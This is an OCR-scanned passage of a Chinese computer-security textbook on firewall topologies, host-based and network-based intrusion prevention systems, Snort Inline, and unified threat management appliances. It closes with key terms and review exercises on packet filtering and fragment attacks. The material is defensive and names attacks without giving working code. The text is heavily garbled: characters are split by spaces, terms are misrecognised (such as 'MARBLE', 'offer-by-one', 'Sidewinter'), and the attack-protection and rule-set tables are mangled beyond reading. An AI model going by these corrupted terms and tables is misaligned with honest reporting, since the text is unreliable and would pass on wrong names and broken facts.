有 了 分 布 式 防火 墙 ， 就 使 得 同时 建立 内 部 和 外 部 非 军事 区 有 了 可 能 。 那 些 由 于 没有 多 少 重 
要 信息 而 不 需要 太 多 保护 的 网 络 服务 器 可 以 被 设置 在 外 部 非 军事 区 ， 位 于 外 部 防火 墙 外 侧 。 由 
这 些 服务 器 上 设置 的 基于 主机 的 防火 墙 提供 必要 的 保护 。 

安全 监控 是 分 布 式 防火 墙 配置 的 一 个 很 重要 的 方面 。 典 型 的 监控 包括 日 志 统计 和 分 析 、 防 
火 墙 统计 ， 以 及 细 粒 度 (fine-grained) 的 单个 主机 的 远程 监控 (如果 有 需要 的 话 )。 


9.5.4 ”防火 墙 部 署 和 拓扑 结构 小 结 


现在 对 9.4 节 和 9.5 节 的 讨论 作 一 小 结 ， 为 防火 墙 部 署 和 拓扑 结构 定义 一 个 范围 。 可 选 的 
防火 墙 包括 : 

e 主机 驻 留 防火 墙 (host-resident firewall): 这 一 类 防火 墙 包括 个 人 防火 墙 软件 和 服务 器 上 
的 防火 墙 软件 。 这 种 防火 墙 可 以 单独 使 用 ， 也 可 以 作为 全 面 (in-depth) 防火 墙 的 一 个 
部 分 进行 部 署 。 

o 屏蔽 路 由 器 (screening router): 外 部 网 络 与 内 部 网 络 之 间 具 有 无 状态 或 者 全 部 包 过 滤 功 
能 的 单个 路 由 器 。 这 种 布置 通常 适用 于 小 型 办 公 室 / 家 庭 办 公 室 (SOHO) 应 用 。 

e thw ARBL +H (single bastion inline): 一 种 在 外 部 和 内 部 路 由 器 之 间 的 单独 防火 墙 
设备 (例如 ， 图 9-1a)。 这 个 防火 墙 可 以 实现 状态 检测 过 滤 或 者 应 用 程序 代理 。 这 是 
小 、 中 型 机 构 应 用 的 典型 防火 墙 配 置 。 
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图 9-4 分布 式 防火 墙 配 置 示例 


e 独立 T 型 堡垒 主机 (single bastion T): 类 似 于 独立 内 艇 堡垒 主机 ， 但 是 在 堡垒 主机 上 有 
一 个 单独 的 接口 通 往 一 个 非 军 事 区 DMZ， 外 部 可 见 的 服务 器 设置 在 此 非 军 事 区 内 。 同 
样 ， 这 是 大 中 型 机 构 中 常用 的 一 种 应 用 配置 结构 。 

© MARBLE (double bastion inline): 图 9-2 给 出 了 这 种 配置 ， 在 这 种 结构 中 ， 非 军 
事 区 被 夹 在 两 个 堡垒 防火 墙 中 间 。 这 种 配置 通常 在 大 型 商业 机 构 和 政府 机 构 中 使 用 。 

© 双 T 型 堡垒 主机 (double bastion T): 图 8-5 展示 了 这 种 结构 。 非 军事 区 连接 在 堡垒 防 
火 墙 的 一 个 独立 的 网 络 接口 上 。 这 种 配置 同样 常见 于 大 型 商业 机 构 和 政府 机 构 中 ， 并 
且 可 能 是 被 要 求 使 用 的 。 

e 分 布 式 防火 墙 配置 ( distributed firewall configuration): 如 图 9-4 所 示 。 这 种 配置 被 大 型 
商业 机 构 和 政府 部 门 使 用 。 


96 入侵 防护 系统 


最 近 新 增 的 一 个 安全 产品 是 人 侵 防护 系统 ( IPS)， 也 称 为 人 侵 检测 防御 系统 ( IDPS)。 这 
是 对 IDS 的 一 种 扩展 ， 它 可 以 在 检测 到 恶意 行为 时 阻 断 或 防止 恶意 活动 。 像 第 8 章 讨论 的 IDS 
一 样 ，IPS 也 分 为 基于 主机 、 基 于 网 络 、 基 于 分 布 式 或 混合 式 这 几 种 类 别 。 同 样 ， 它 也 用 异常 
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检测 来 识别 非法 用 户 的 行为 ， 或 者 用 特征 和 启发 式 检测 来 识别 已 知 的 恶意 行为 。 

一 旦 DS 检测 到 亚 意 行为 ， 就 可 以 修改 或 者 阻止 进入 外 围 或 者 进入 主机 的 网 络 包 ， 或 者 
修改 或 者 阻止 主机 上 正在 运行 的 程序 所 发 起 的 系统 调用 。 因 此 ， 网 络 IPS 像 防火 墙 一样 ， 可 以 
阻 断 网 络 流量 ,但 却 需 要 根据 预 设 的 算法 来 决定 后 面 该 干 些 什么 。 网 络 IPS 究竟 是 一 种 独立 的 
新 产品 ， 还 是 防火 墙 的 另外 一 种 形式 ， 这 是 一 个 术语 问题 。 


9.6.1 基于 主机 的 IPS 


基于 主机 的 IPS (HIPS) 能 够 使 用 特征 /启发 式 检 测 或 异常 检测 来 识别 攻击 。 使 用 前 者 的 
话 ， 重 点 在 于 从 应 用 程序 网 络 流 量 的 内 容 或 系统 调用 的 顺序 之 中 ， 查 找 可 被 认为 是 恶意 行为 的 
特征 。 而 使 用 后 者 的 话 ，IPS 主要 寻找 能 够 表明 某 软件 为 恶意 的 行为 模式 。HIPS 中 所 涉及 的 恶 
意 行 为 类 型 的 例子 主要 有 以 下 几 种 : 
e 对 系统 资源 的 修改 (modification of system resource): rootkit、 木 马 和 后 门 程序 是 通过 修 
改 系统 资源 (比如 库 、 目 录 、 注 册 表 设置 和 用 户 账户 ) 来 运行 的 。 
e 提 权 攻击 (privilege-escalation exploit): 这 种 攻击 试图 授予 普通 用 户 root 访问 权限 。 
e 缓冲 区 溢出 攻击 (bufferoverflow exploit): 这 种 攻击 将 在 第 10 章 中 进行 介绍 。 
e 访问 电子 邮件 通信 录 (access to e-mail contact list): 许多 蠕虫 通过 将 它们 自身 的 找 贝 发 
送 到 本 地 系统 的 电子 邮件 地 址 德 中 的 地 址 的 方式 进行 传播 
e ARSA (directory traversal): 在 Web 服务 器 上 的 目录 遍历 漏洞 ， 允 许 黑 客 访问 服务 
器 应 用 程序 用 户 正 常 访 问 范围 之 外 的 文件 。 
像 这 样 的 攻击 会 引起 可 以 被 HIPS 分 析 的 行为 。HIPS 能 够 为 特定 的 平台 进行 适当 的 定制 。 
可 以 在 台式 系统 或 者 服务 器 系统 中 使 用 一 套 通用 的 工具 。 一 些 HIPS 套装 被 设计 用 来 保护 特定 
种 类 的 服务 器 ， 例 如 Web 服务 器 和 数据 库 服 务 器 。 在 这 种 情形 下 ，HIPS 搜寻 特殊 的 应 用 攻击 。 
除了 特征 检测 和 异常 检测 技术 之 外 ，HIPS .还 可 以 使 用 沙 箱 方 法 (sandbox approach) 。 沙 箱 
方法 特别 适用 于 移动 代码 ， 比 如 ，Java 小 程序 和 脚本 语言 。HIPS 将 这 些 代 码 隔离 在 一 个 独立 
的 系统 区 域内 ， 然 后 运行 它 并 监视 其 行为 。 如 果 受 监视 代码 违犯 了 预先 定义 的 策略 或 者 符合 预 
先 定义 的 行为 特征 ， 它 将 被 停止 并 且 禁 止 在 正常 系统 环境 中 执行 。 
[ROBB06a] 列 出 了 以 下 典型 的 HIPS 提供 的 桌面 系统 保护 的 范围 : 
© 系统 调用 ( system call): 内核 控 制 着 对 系统 资源 (比如 存储 器 、LO 设备 和 处 理 器 ) 的 
访问 。 如 果 要 使 用 这 些 资源 ， 用 户 应 用 程序 需要 调用 系统 调用 进入 系统 内 核 空 间 。 任 
何 攻击 代码 将 会 执行 至 少 一 个 系统 调用 ，HIPS 可 以 配置 成 检查 每 个 系统 调用 的 恶意 
特征 。 
© 文件 系统 访问 (file system access); HIPS 可 以 确保 文件 访问 系统 调用 是 非 恶 意 的 并 且 符 
合 既 定 的 安全 策略 。 
系统 注册 表 设 置 ( system registry setting) : 注册 表 维 护 着 程序 的 日 常 配 置信 息 ， 它 经 常 
被 恶意 地 修改 以 延长 一 次 攻击 的 存活 期 。HIPS 可 以 确保 系统 注册 表 保 持 其 完整 性 。 
© 主机 输入 / 输出 (host input/output): IO 通信 ， 无 论 是 本 地 的 还 是 基于 网 络 的 ， 都 可 以 
传播 攻击 代码 和 恶意 程序 。HIPS 可 以 检测 并 加 强 合 法 的 客户 端 与 网 络 的 交互 ， 以 及 客 
户 端 与 其 他 设备 的 交互 。 
HIPS 的 角色 ”许多 行业 观察 员 注意 到 企业 终端 ， 包 括 桌 面 系统 和 便携 式 电脑 系统 ， 已 经 
成 为 黑客 活动 和 犯罪 的 主要 目标 ， 甚 至 超过 了 网 络 设 备 [ROBB06b]。 因 此 ， 安 全 设备 提供 商 
们 现在 更 加 重视 终端 安全 产品 的 开发 。 传 统 的 终端 安全 是 由 一 系列 功能 不 同 的 产品 共同 提供 
的 ， 比 如 反 病 毒 软 件 、 反 垃圾 邮件 软件 和 个 人 防火 墙 。HIPS 方法 是 试图 由 单一 产品 提供 集成 
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的 功能 组 的 一 种 尝试 。 集 成 的 HIPS 方法 的 优点 是 多 种 工具 配合 紧密 ， 威 胁 防护 更 加 广泛 ， 管 
理 也 更 简单 。 

像 HIPS 这 样 的 终端 安全 产品 ， 如 果 足 够 复杂 ， 就 能 消除 或 者 至 少 减少 对 网 络 层 设 备 的 需 
求 ， 这 可 能 是 很 诱 人 的 。 举 个 例子 ， 圣 迭 哥 (San Diego) 超级 计算 机 中 心 在 报告 中 称 ， 在 不 使 
用 防火 墙 而 仅仅 使 用 终端 安全 保护 的 条 件 下 [SING03]， 四 年 多 的 时 间 内 ， 在 其 所 管理 的 计算 
机 上 没有 任何 入侵 。 然 而 ， 更 为 谨慎 的 做 法 是 将 HIPS 作为 涉及 网 络 层 设备 〈 例 如， 防火 墙 或 
者 基于 网 络 的 IPS) 的 一 整套 策略 中 的 一 个 组 件 使 用 。 


9.6.2 ”基于 网 络 的 IPS 


一 个 基于 网 络 的 IPS (NIPS) 实质 上 是 一 个 具有 丢弃 数据 包 和 断 开 TCP 连接 权限 的 内 髓 
NIDS (基于 网 络 的 入 侵 检测 系统 )。 和 NIDS 一 样 ，NIPS 使 用 诸如 特征 /启发 式 检测 和 异常 检 
测 之 类 的 技术 。 
在 所 有 NIPS 中 使 用 但 是 在 防火 墙 中 并 不 常见 的 技术 是 流 数据 的 保护 。 这 种 技术 要 求 对 一 
个 数据 包 序列 中 的 应 用 净 荷 进行 重组 。 每 当 数 据 流 中 的 一 个 新 包 到 达 时 ，IPS 设备 对 流 的 全 部 
内 容 进行 过 滤 。 当 一 个 数据 流 被 确定 为 恶意 时 ， 最 后 到 达 以 及 所 有 属于 可 疑 数据 流 的 嫌疑 数据 
包 都 会 被 丢弃 。 
按照 NIPS 设备 使 用 的 识别 恶意 数据 包 的 常用 方法 中 ， 以 下 几 种 都 较为 典型 : 
o 模式 匹配 (pattern matching): 扫描 进入 的 数据 包 ， 寻 找 数据 库 中 已 知 攻 击 的 特定 的 字 
节 序 列 〈 即 代码 特征 )。 

© 状态 匹配 ( stateful matching): 在 一 个 上 下 文 相关 的 传输 流 中 扫描 攻击 特征 码 ， 而 不 是 
在 各 个 数据 包 中 查找 。 

© 协议 异常 (protocol anomaly); 按照 RFC 中 提 及 的 标准 陈述 寻找 偏差 。 

o 传输 异常 (traffic anomaly): 寻找 不 寻常 的 传输 活动 ， 例 如 一 个 UDP 数据 包 洪 泛 流 或 
者 网 络 中 出 现 的 一 个 新 设备 。 

o 统计 异常 (statistical anomaly): 开发 一 些 正 常 传输 活动 和 吞吐 量 的 基线 ， 并 且 在 与 基线 
发 生 偏离 时 进行 报警 。 


9.6.3 ”分 布 式 或 混合 式 IPS 


最 后 一 类 IPS 采用 了 分 布 式 或 混合 式 方法 。 它 的 做 法 是 收集 大 量 基于 主机 和 基于 网 络 的 传 
感 器 数据 ， 将 其 传送 到 中 央 处 理 系统 。 而 中 央 处 理 系统 能 够 对 这 些 数据 进行 关联 分 析 ， 并 更 新 
特征 和 行为 模式 ， 从 而 使 得 所 有 的 协作 系统 可 以 防范 和 对 抗 恶意 行为 。 目 前 已 经 提出 了 若干 这 
样 的 系统 ， 其 中 最 为 著名 的 就 是 数字 免疫 系统 (digital immune system). 

数字 免疫 系统 ”数字 免疫 系统 是 IBM 研发 的 一 套 全 面 防 御 系 统 ， 可 以 抵御 由 恶意 软 
件 引 发 的 恶意 行为 [KEPH97a、KEPH97b、WHIT99]， 该 系统 随后 由 Symantec 进行 了 完善 
[SYMA01]。 它 的 开发 动机 主要 有 基于 网 络 的 恶意 软件 的 威胁 、 由 Internet 所 带 来 的 不 断 增 长 
的 传播 速度 以 及 对 该 情形 全 面 掌 控 的 需求 。 

为 了 应 对 由 Internet 长 足 发 展 所 带 来 的 威胁 ，IBM 研发 了 数字 免疫 系统 的 原型 。 该 系统 由 
6.9 节 所 介绍 的 程序 模拟 器 扩展 而 来 ， 是 一 个 普 适 的 模拟 器 和 恶意 软件 检测 系统 。 该 系统 的 目 
标 是 ,一旦 发 现 恶 意 软 件 ， 立 即 给 出 一 个 快速 的 响应 ， 以 便 将 其 清除 。 当 一 个 新 的 恶意 软件 进 
入 某 机 构 时 ， 免 疫 系统 能 自动 地 捕获 、 分 析 并 为 它 增 加 防范 措施 ， 移 除 它 ， 并 将 相关 信息 发 送 
到 客户 系统 ， 进 而 使 恶意 软件 在 其 他 地 方 运行 之 前 就 被 检测 到 。 

数字 免疫 系统 能 否 成 功 主要 取决 于 恶意 软件 分 析 系 统 检测 新 的 恶意 软件 的 能 力 。 通 过 对 网 
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络 上 新 发 现 的 恶意 软件 进行 实时 分 析 和 监测 ， 系 统 可 以 持续 对 免疫 软件 进行 更 新 ， 以 跟 上 威胁 
的 发 展 步伐 。 

图 9-5 展示 了 一 个 最 初 被 设计 用 来 检测 蠕虫 的 混合 式 架 构 的 例子 。 该 系统 以 下 列 方式 工作 
(图 中 的 数字 指 的 是 列 的 编号 )。 

1. 在 不 同 的 网 络 和 主机 位 置 部 署 传感器 用 于 检测 潜在 的 恶意 软件 扫描 、 注 入 或 执行 。 传 感 
器 逻辑 也 可 以 和 IDS 传感器 协作 。 

2. 传感器 给 中 央 服 务 器 发 送 警 报 和 检测 到 的 恶意 软件 副本 ， 中 央 服 务 器 会 关联 和 分 析 这 些 
信息 。 关 联 服 务 器 能 够 确定 被 检测 到 的 软件 为 恶意 软件 的 可 能 性 及 其 关键 特征 。 

3. 服务 器 将 信息 发 送 到 一 个 受 控 环境 中 ， 在 这 里 潜在 的 恶意 软件 被 放 入 沙 盒 中 进行 分 析 和 
测试 。 

4. 受 控 系统 测试 疑似 为 目标 应 用 程序 某 版 本 的 可 疑 软 件 以 确认 漏洞 。 

5. 受 控 系统 生成 一 个 或 多 个 软件 补丁 并 测试 它们 。 

6. 如 果 补 丁 不 会 受到 注 人 影响 ， 且 不 会 损坏 应 用 程序 的 功能 ， 那 么 系统 会 给 应 用 程序 所 在 
主机 发 送 补 丁 进 行 更 新 。 





图 9-5 恶意 软件 监控 系统 的 布置 (根据 [SIDI05] 调整 ) 


9.6.4 Snort Inline 


Snort 是 一 种 轻 量 级 的 人 侵 检 测 系 统 ， 我 们 在 8.9 节 中 进行 了 介绍 。Snort Inline 是 Snort 的 
改进 版 ， 它 使 得 Snort 具有 和信 侵 防护 的 功能 。Snort Inline 中 加 入 了 3 种 新 的 规则 来 提供 入 侵 防 
御 功 能 : 

e EF (drop): Snort 依据 规则 中 定义 的 规则 拒绝 数据 包 ， 并 将 结果 记录 下 来 。 

o 拒绝 (reject): Snort 拒绝 一 个 数据 包 并 且 记录 结果 。 另 外 ， 还 返回 一 个 错误 消息 。 如 

果 是 TCP 包 ， 这 个 消息 是 一 个 TCP 复位 消息 ， 它 重 置 这 个 TCP 连接 。 如 果 是 UDP 
包 ， 一 个 ICMP 端口 不 可 到 达 消 息 会 被 发 送 到 UDP 包 的 发 起 人 。 
© 简单 丢弃 (Sdrop): 人 侵 检测 系统 拒绝 一 个 数据 包 ， 但 是 并 不 记录 它 。 
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Snort Inline 包含 一 个 可 替换 的 选项 ， 此 选项 允许 Snort 的 用 户 修改 数据 包 而 不 是 丢弃 它 
们 。 这 个 特点 对 蜜 钠 系 统 的 实现 很 有 帮助 [SPIT03]。 蜜 钠 系 统 是 通过 修改 数据 包 的 内 容 使 攻击 
失去 效力 ， 而 不 是 阻止 检测 到 的 攻击 。 攻 击 者 发 送 他 们 的 人 侵 程序 ， 使 之 通过 Intenet 攻击 他 
们 想 要 攻击 的 目标 ， 但 是 Snort Inline 可 以 让 这 些 攻 击 失效 ， 最 终 失败 。 攻 击 者 可 以 发 觉 失 败 
但 是 搞 不 清 为 什么 会 失败 。 蜜 钠 系 统 则 可 以 在 降低 危害 远程 系统 的 风险 的 同时 ， 继 续 监视 攻 
击 者 。 


9.7 实例: 一 体 化 威胁 管理 产品 


在 前 面 几 章 里 ， 我 们 回顾 了 一 些 对 抗 恶意 软件 和 基于 网 络 的 攻击 的 方法 ， 包 括 一 些 反 病毒 
和 反 蠕 虫 产品 、IPS MIDS 以 及 防火 墙 。 这 些 系 统 的 实现 可 以 提供 一 个 利用 多 层 过 滤 和 防御 机 
制 来 阻止 攻击 的 全 面 深 入 的 防御 体系 。 这 种 分 步 实现 的 消极 方面 表现 在 ， 需 要 配置 、 部 署 和 管 
理 一 系列 的 设备 和 软件 包 等 。 另 外 ， 顺 序 地 部 署 一 定数 量 的 设备 可 能 会 降低 原 有 的 性 能 。 

一 种 降低 管理 和 实施 的 负担 的 方法 是 ， 用 一 个 单一 的 集成 了 多 种 对 抗 基于 网 络 的 攻击 方法 
的 设备 来 代替 所 有 的 内 艇 网 络 安全 产品 (如 防火 墙 、IPS、IDS、VPN、 反 蠕虫 和 反 间 谍 程 序 ， 
等 等 )。 市场 分 析 机 构 IDC 将 这 种 设备 称 为 一 体 化 威胁 管理 (UTM) 系统 ， 并 对 UTM 给 出 了 
如 下 定义 :“ 将 多 种 安全 特性 集成 在 一 个 盒子 里 的 产品 。 包 含 在 其 中 的 设备 ， 必 须 能 够 实现 网 
络 防火 墙 、 网 络 人 侵 检测 和 防护 ， 以 及 反 病 毒 网 关 的 功能 。 设 备 的 全 部 功能 不 一 定 要 同时 使 
用 ， 但 必须 固有 地 存在 于 该 设备 中 。” 

关于 UTM 的 一 个 争论 焦点 是 其 性 能 ， 其 中 吞吐 量 和 延迟 是 两 个 重要 的 性 能 指标 。 
[MESS06] 报告 中 称 ， 现 有 商业 设备 普遍 的 吞吐 量 损失 是 50%。 因 此 ， 客 户 们 被 建议 去 使 用 高 
性 能 、 大 吞吐 量 的 设备 以 将 这 种 明显 的 性 能 劣势 降 到 最 低 。 

图 9-6 是 一 个 典型 的 UTM 设备 的 体系 结构 。 以 下 功能 是 值得 注意 的 : 

1. 若 有 必要 ， 和 人 站 流量 在 最 初 被 检查 之 前 先进 行 解密 。 如 果 设备 具有 VPN 边界 结 点 的 功 
能 ， 那 么 这 里 需要 进行 IPsec 解密 。 

2. 第 一 道 防火 墙 模块 过 滤 网 络 流量 ， 丢 弃 那 些 违 未 被 处 理 的 到 达 流 量 
反 规则 的 数据 包 ， 或 允许 那些 符合 防火 墙 策略 中 的 规 
则 集 的 数据 包 通 过 。 

3. 除 了 这 一 点 ， 若 干 模 块 用 来 在 多 种 协议 层面 处 
理 个 人 数据 包 和 数据 包 流 。 在 这 种 特定 的 配置 中 ， 数 fo BRR 
据 分 析 引 擎 负责 跟踪 数据 包 流 和 协调 反 病毒 、IDS A E 
IPS 引擎 的 工作 。 

4. 数据 分 析 引 擎 还 将 多 包 (multipacket) 净 荷 进行 
重新 组 装 ， 利 用 反 病 毒 引 擎 、 网 络 过 滤器 和 反 垃 圾 邮 上 
件 模块 进行 内 容 分 析 。 

5, 一 些 和 站 的 网 络 流量 可 能 需要 被 再 次 加 密 以 维 
护 企业 内 部 网 络 数据 流 的 安全 。 

6. 所 有 检测 到 的 威胁 都 被 报告 给 日 志 模块 和 报 
告 模 块 ， 用 于 在 指定 情况 下 发 出 警报 ， 以 及 网 络 取证 
分 析 。 

7. 带宽 定型 (bandwidth-shaping) 模块 可 以 使 用 多 干净 的 受 控 流量 
种 优先 权 和 服务 质量 (QoS) 算法 来 优化 性 能 。 图 9-6 一 体 化 威胁 处 理 设备 

作为 UTM 设备 应 用 领域 的 一 个 例子 ， 表 9-3 和 来 源 : 基于 [JAME06] 
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K 9-4 列 出 了 Secure Computing 推 向 市 场 的 UTM 设备 能 够 对 抗 的 部 分 攻击 。 
R 9-3 Sidewinder G2 安全 设备 攻击 防护 摘要 一 一 传输 层 举 例 


攻击 以 及 Internet 威胁 









o 强制 使 用 正确 TCP 标记 
e 无 效 的 端口 号 @ 强制 使 用 TCP 消息 头 长 度 
@ 无 效 的 序列 号 © 确保 正确 的 3 次 握手 
i aie © 正确 地 关闭 TCP 会 话 
@ 无 效 的 CRC 校 验 值 paar eek een loll 
ee eni @ 强制 使 用 正确 的 TCP 标记 法 
@ 管理 TCP 会 话 超时 
TCP o 随机 数据 作为 TCP 头 © 阻止 SYN 攻击 
' m tld o 重组 数据 包 确 保 正确 性 
© 小 PMTU (路 径 最 大 传输 单元 ) 攻击 men pe pola 
: ae @ 通过 访问 列表 进行 传输 控制 
o 分 组 骗术 : 利用 不 同 的 TCP 选项 集 aaa al ği 







@ 无 效 的 UDP 包 

Upe @ 利用 随机 UDP 数据 以 绕 开 规则 @ 验证 正确 的 UDP 包 
o 连接 预测 @ 在 未 打开 的 端口 处 丢弃 UDP 包 
@ UDP 端口 扫描 


表 9-4 Sidewinder G2 安全 设备 攻击 防护 摘要 一 一 应 用 层 举例 


攻击 和 Internet 威胁 保护 措施 


对 AAAA 查询 错误 的 NXDOMIAN 响应 可 能 | @ 不 允许 负 缓存 (negative caching) 
引起 拒绝 服务 条 件 © 防止 DNS BPE 


错误 形成 的 DNS 消息 会 影响 防火 墙 的 运行 ， 
Sidewinder G2 可 以 防止 这 样 的 恶意 使 用 

防止 DNS 查询 攻击 

防止 DNS 应 答 攻 击 


ISC BIND 9 在 9.2.1 之 前 的 版 本 允许 远程 攻击 

者 用 一 个 有 缺陷 的 DNS 包 来 引起 一 次 拒绝 服务 

(关机 )。 该 包 触发 一 个 错误 条 件 ， 即 当 message.c 

DNS 中 的 dns_message findtype0 函数 中 的 rdataset & 
BORA NULL 时 ， 该 包 不 能 被 正确 处 理 


预防 区 域 传输 和 区 域 查询 

真正 的 基于 Type Enforcement 技术 的 DNS 分 割 保 
护 ， 将 DNS 划分 为 公共 DNS 区 域 和 专用 DNS 区 域 
关闭 递归 的 能 力 


DNS 信息 阻碍 以 及 其 他 DNS 滥用 


FTP 反弹 攻击 

PASS 攻击 Sidewinder G2 可 以 过 滤 FTP 命令 以 阻止 这 些 攻击 
FTP 端口 注入 攻击 真正 的 网 络 隔离 阻止 分 段 攻击 

TCP 分 段 攻击 


FTP 









验证 PNG 和 RSTP 协议 ， 丢 弃 所 有 其 他 的 数据 包 
辅助 端口 的 监视 


@ 受 Type Enforcement 技术 保护 的 智能 代理 
a || SO ial Aaa e 经 过 非 透明 连接 隐藏 内 部 DB 

@ 受 Type Enforcement 技术 保护 的 智能 代理 
© 协议 验证 

实时 流 协 | @ 缓冲 区 溢出 o 拒绝 多 播 流 量 

N (RTSP) | @ 拒绝 服务 o 检查 建立 和 拆除 的 方法 
e 
° 
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( 续 ) 










攻击 和 Internet 威胁 保护 措施 
© SNMP 洪 泛 攻击 @ 过 滤 SNMP 版 本 1. 2c 的 网 络 流量 
smr. |° 默认 团体 攻击 @ 过 滤 读 、 写 和 通知 消息 
@ BAKE @ 过 滤 OIDS 
@ SNMP 攻击 © 过 滤 PDU (协议 数据 单元 ) 
@ 质询 - 响应 缓冲 区 溢出 
@ SSHD 人 允许 用 户 覆 盖 “ Allowed Authenticati- 


on” 位 Sidewinder G2 v6.x "P x A K} Type Enforcement 技 













SSH 术 严 格 限制 了 Secure Computing 对 OpenSSH 守护 进 
© OpenSSH buffer_append_space 缓冲 区 溢出 
© OpenSSH/PAM 质询 — 响应 缓冲 区 溢出 程 代码 的 版 本 修改 能 力 
© OpenSSH 信道 代码 offer-by-one 
npea iia © Type Enforcement 技术 保护 的 Sendmail 结构 分 
: aa a o 出 于 控制 目的 的 Sendmail 自 定义 
= a 地 址 解析 缓冲 区 溢出 © 利用 Type Enforcement 技术 防止 缓冲 区 溢出 
e SMTP 协议 异常 @ Sendmail 检查 SMTP 协议 的 异常 情况 
© 协议 确认 
SMTP ead pe © 反 垃 圾 邮件 过 滤器 
sae eke o 邮件 过 滤 ， 依 据 邮 件 大 小 和 关键 词 
© 特征 码 反 病 毒 
RE, KD, h w N 
电子 邮件 地 址 欺骗 © MIME/ 反 病 毒 过 滤器 
ee = BAAS 
o 通过 病毒 扫描 反 网 络 钓鱼 
广告 软件 用 于 收集 与 营销 相关 的 信息 
假 马 内 置 于 Sidewinter G2 的 SmartFilter URL 过 滤 机 
间谍 软件 特洛伊 木马 制 ， 经 过 配置 能 够 过 滤 间 谍 软 件 的 URL， 防 止 恶意 
恶意 软件 下 载 
后 门 
9.8 推荐 读物 


经 典 的 有 关 防 火 墙 的 介绍 见 [CHES03]。 文 献 [LODI98], [OPPL97] 和 [BELL94] 是 有 关 防 
火 墙 主题 的 概述 性 文章 。[SCAR09b] 是 关于 防火 墙 技 术 和 防火 墙 策 略 的 非常 好 的 综述 性 资料 。 
IPS 在 [SCAR12] 中 有 所 提 到 。 
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the Wily Hacker. Reading, MA: Addison-Wesley, 2003. 

Lodin, S., and Schuba, C. “Firewalls Fend Off Invasions from the 

Net.” JEEE Spectrum, February 1998. 

Oppliger, R. “Internet Security: Firewalls and Beyond.” 

Communications of the ACM, May 1997. 

Scarfone, K., and Mell, P. Guide to Intrusion Detection and Prevention 

Systems. NIST Special Publication SP 800-94 rev 1 (draft), July 2012. 

SCAR09b Scarfone, K., and Hoffman, P. Guidelines on Firewalls and Firewall 
Policy. NIST Special Publication SP 800-41 rev 1, September 2009. 
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99 关键 术语 、 复 习题 和 习题 


关键 术语 

application-level gateway (应 用 级 网 关 ) IP security (IPSec, IP 安全 ) 

bastion host (4244E#L) network-based IPS (基于 网 络 的 IPS) 

circuit-level gateway (电路 级 网 关 ) packet filtering firewall ( 包 过 滤 防 火 墙 ) 
demilitrarized zone (DMZ， 非 军事 区 ) personal firewall (个 人 防火 墙 ) 

distributed firewalls (分 布 式 防火 墙 ) proxy (代理 ) 

firewall (防火 墙 ) stateful packet inspection firewall (状态 检测 防火 墙 ) 
host-based firewall (基于 主机 的 防火 墙 ) tiny fragment attack (细小 分 段 攻 击 ) 

host-based IPS (基于 主机 的 IPS) unified threat management (UTM， 统 一 威胁 管理 ) 
intrusion prevention system(IPS， 人 侵 防 护 系统 ) virtual private network (VPN， 虚 拟 专用 网 ) 


IP address spoofing (IP 地 址 欺骗 ) 


复习 题 


9.1 


9.2 


9.3 


列 出 防火 墙 设计 的 三 个 目标 。 
列 出 防火 墙 控制 访问 及 执行 安全 策略 的 4 种 技术 。 
典型 的 包 过 滤 防 火 墙 使 用 了 什么 信息 ? 
包 过 滤 防 火 墙 有 哪些 弱点 ? 
包 过 滤 防火 墙 和 状态 检测 防火 墙 的 区 别 是 什么 ? 
什么 是 应 用 级 网 关 ? 
什么 是 电路 级 网 关 ? 
图 9-1 中 不 同 的 防火 墙 的 区 别 是 什么 ? 
堡垒 主机 的 一 般 特 征 是 什么 ? 
为 什么 布置 基于 主机 的 防火 墙 很 有 用 ? 
什么 是 DMZ 网 络 ? 在 这 样 的 网 络 中 你 希望 看 到 怎样 的 系统 ? 
内 部 防火 墙 和 外 部 防火 墙 的 区 别 是 什么 ? 
IPS 是 如 何 区 别 于 防火 墙 的 ? 
IPS 可 以 部 署 在 哪些 不 同 的 位 置 ? 
IPS 是 如 何 阻 止 恶 意 活动 的 ? 
UTM 系统 是 如 何 区 别 于 防火 墙 的 ? 


就 像 在 9.3 节 中 提 到 的 那样 ， 一 个 阻止 细小 分 段 攻击 的 方法 是 在 P 包 的 第 一 个 段 中 加 入 传输 头 的 最 
小 强制 长 度 。 如 果 第 一 个 分 段 被 拒绝 了 ， 那 么 所 有 后 继 的 分 段 都 会 被 拒绝 。 然 而 ,根据 IP 包 的 性 
质 ， 这 些 分 段 可 能 不 会 按 顺 序 到 达 。 因 此 ， 某 个 中 间 的 分 段 可 能 在 第 一 个 分 段 被 拒绝 前 就 通过 了 过 
滤器 。 那 么 ， 怎 么 处 理 这 种 情况 呢 ? 

在 一 个 IPv4 包 中 ， 第 一 个 分 段 中 净 荷 的 长 度 (用 八 位 的 字 节 表示 ) 等 于 总 长 度 (Total Length) 
(4 x IHL)。 如 果 这 个 值 小 于 需要 的 最 小 值 (在 TCP 中 是 8 字 节 )， 则 这 个 分 段 和 整个 包 都 被 拒绝 。 如 
果 仅 使 用 分 段 偏 移 (Fragment Offset) 域 ， 请 提出 一 种 可 选 的 方法 来 达到 相同 的 效果 。 

RFC 791 (IPv4 协议 规范 ) 描述 了 一 个 重组 算法 ， 此 算法 会 导致 新 分 段 履 盖 掉 之 前 接收 到 的 分 段 的 
任意 交 又 部分。 攻击 者 可 以 利用 给 定 的 这 个 重组 算法 构造 一 系列 包 ， 其 中 最 低 的 ( 零 偏 移 ) 分 段 包 
含 无 害 的 数据 (因此 该 分 段 能 够 通过 包 过 滤器 )， 接 下 来 某 个 非 零 偏 移 的 包 会 与 TCP 头 信息 (例如 
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9.4 


9.5 


目的 端口 ) 交友 并 将 其 修改 。 由 于 第 二 个 包 不 是 零 分 段 偏 移 的 ， 因 此 它 可 以 通过 大 多 数 过 滤器 。 请 
设计 一 个 可 以 抵抗 这 种 攻击 的 包 过 滤 方 法 。 

K 9-5 显示 了 对 于 一 个 IP 地址 从 192.168.1.0 到 192.168.1.254 的 虚拟 网 络 的 包 过 滤 防 火 墙 规则 集 的 
一 个 样本 。 请 描述 一 下 每 条 规则 的 作用 。 


表 9-5 ”样本 包 过 滤 防 火 墙 规则 集 


192.168.1.1 2 


任意 任意 
区 
任意 任意 任意 


SMTP (简单 邮件 传递 协议 ) 是 一 个 通过 TCP 协议 在 主机 之 间 传 递 邮 件 的 标准 协议 。 在 用 户 代 理 端 
和 服务 程序 之 间 建 立 一 个 TCP 连接 。 服 务 程 序 监视 25 TCP 端口 来 查看 是 否 有 连接 请 求 。 连 接 的 用 
